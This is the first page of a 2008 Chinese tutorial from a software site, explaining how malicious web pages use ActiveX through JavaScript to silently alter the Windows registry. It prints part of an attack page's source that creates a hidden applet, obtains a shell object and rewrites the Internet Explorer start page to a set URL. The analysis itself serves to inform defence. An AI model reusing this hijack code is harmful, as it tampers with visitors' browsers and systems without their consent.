文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院操作系统 注册表深入剖析恶意攻击性网页-注册表全攻略
精品推荐
特别推荐
·自动播放光碟
·解决注册表被锁问题100%有效的办法
·深入剖析恶意攻击性网页-注册表全攻略
·修改注册表,清除黑客程序
·Vista 105个禁止功能的注册表条目
·妙用注册表来清理系统垃圾文件
·更改系统收藏夹路径的三种方法
·用注册表和组策略管好网络设置
·Windows隐蔽的清理注册表垃圾方法
·取消开机检查磁盘的三种方法
热点TOP10
·绝对好用的注册表技巧
·注册表应用100例—注册表使用全攻略之十一
·添加或删除启动时自动运行的程序
·注册表修改大全之XP
·注册表知识:HKEY_LOCAL_MACHINE根键详解
·常用注册表设置
·注册表背后的秘密
·禁止使用网上邻居
·取消开机检查磁盘的三种方法
·修改注册表,清除黑客程序

深入剖析恶意攻击性网页-注册表全攻略

日期:2008年5月18日 作者: 查看:[大字体 中字体 小字体]


56、深入剖析恶意攻击性网页 

    最近越来越多的个人网站都采用了恶意攻击性网页,从开始的只是修改IE首页地址,强迫大家一打开IE就进入他的主页来提高主页访问量,

愈演愈烈,到最后发展到锁定IE部分功能阻止用户恢复,甚至有的网页浏览后造成系统崩溃、数据丢失!对于此种用心险恶的途径,以经到了让

人发指的地步,为了增强大家上网安全,今天我们来深入剖析一下这些阴险网页的工作原理和应采取的预防措施。 首先,我们来了解一下

Windows中注册表的概念。 
     在计算机操作系统中都可以由用户按照各自的要求及硬件性能对计算机系统的硬件和软件进行各种各样的配置,这些配置参数就是配置文

件,如在DOS中的Config.sys文件。在早期的Win3.x中,对软硬件的配置参数是在扩展名为.ini的文件中存放的,但微软设计时考虑不足造成了每

种设备或应用程序都有自己的INI文件,使管理及通用性都难以处理。因此在Windows 95开始后继版本中,将各种软、硬件的有关配置和状态信

息;用程序和资源管理器外壳的初始条件、首选项和卸载数据;算机的整个系统的设置和各种许可,文件扩展名与应用程序的关联, 硬件的描

述、状态和属性;计算机性能纪录和底层的系统状态信息,以及各类其他数据存储在一起,形成一个庞大的数据库来统一进行管理,这就是

Windows的注册表(Registry)。 
      Windows提供了注册表编辑器(REGEDIT.EXE)和注册表文件(.reg)引入等方法来修改注册表配置,如果我们修改了注册表中的配置参数

(各级子关键字的“键值”),就会改变系统工作状态,可以使系统优化,工作得更好更快,也可以略有不慎使系统出错、崩溃造成不能使用,

所以不提倡对系统配置不熟悉的人随便对注册表进行修改! 
    恶意攻击性网页正是自动修改了浏览该网页的电脑的注册表,从而达到修改IE首页地址、锁定部分功能等的阴险目的。但是它又是如何能在

我们浏览该网页的瞬间,悄悄地修改了注册表的呢?我们还得了解一下微软的ActiveX技术。
      ActiveX是Microsoft提出的一组使用COM(Component Object Model,部件对象模型)使得软件部件在网络环境中进行交互的技术集。它与

具体的编程语言无关。作为针对Internet应用开发的技术,ActiveX被广泛应用于WEB服务器以及客户端的各个方面。同样ActiveX可以应用于网页

编制语言中,利用javascript语句轻易就可以把ActiveX嵌入到Web页面中。目前,很多第三方开发商编制了各式各样的ActiveX控制。在Internet

上,有超过1000个ActiveX控件供用户下载使用。在WINDOWS的SYSTEM目录下,保存有很多Window提供的ActiveX控件。
     考虑到WEB的安全性,为了在服务器与客户端建立良好的信任关系,必须为每个在WEB上使用ActiveX控制设置一个“代码签名”

(Code Signing),VC5.0提供了生成供测试用的“代码签名”的工具。如果要正式发布,则必须向有关机构申请。但又由于“代码签名”技术的

不成熟,造就了阴恶的攻击性代码也可以找到一个“代码签名”顺利进行攻击,修改注册表!看,我们就是这样被微软的不成熟技术暗算了! 
    下面我们来剖析一个简单的攻击性网页源代码: 
<html> 
<head> 
<title>攻击性网页</title> 
</head> 
<body> 
<!--上面是最基本的网页文件头--> 
<script> 
document.write("<APPLET HEIGHT=0 WIDTH=0
code=com.ms.activeX.ActiveXComponent></APPLET>"); 
<!--用javascript语句调用ActiveX--> 
function f( ) 

<!--把下面的攻击性代码定义为一个函数f --> 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
<!--ActiveX的一个合法"代码签名"--> 
a1.createInstance(); 
Shl = a1.GetObject(); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", " http://piaoyes.126.com";); 

[1] [2] [3] [4] [5] [6] [7] [8] 下一页 




上一篇:摆脱可恶网站的阴影-注册表全攻略

下一篇:分析一个网站的恶意代码-注册表全攻略

相关文章:
·为什么iexplore.exe在打开网页时CPU使用会100%?
·注册表已经损坏并导致WindowsXP无法启动,应该如何恢复
·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集
·绝对好用的注册表技巧
·《龙珠大冒险》攻击技巧研究(GBA) - 龙珠Z攻略秘籍 - 龙珠Z
·注册表应用100例—注册表使用全攻略之十一
·注册表修改大全之XP
·万能五笔2001注册码分析及暴力破解 上
·怎样制作网页?
·Coreldraw12官方简体中文版下载及注册码
相关软件:
·Dreamweaver 网页设计
·photoshop cs 超梦幻网页创意宝典
·RegVac Registry Cleaner(注册表吸尘器)V5.01.06 汉化版
·东方网页王III 正式版
·注册表实例应用视频教程swf
·深入理解计算机系统电子杂志 PDF
·诺顿杀毒软件+诺顿防火墙免费破解版 免注册
·网页点击专家 V2.50
·零起点教你如何破解软件和制作注册机 and 视频+程序
·注册表优化实战练习手册(图文教程 菜鸟先飞系列教材)

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot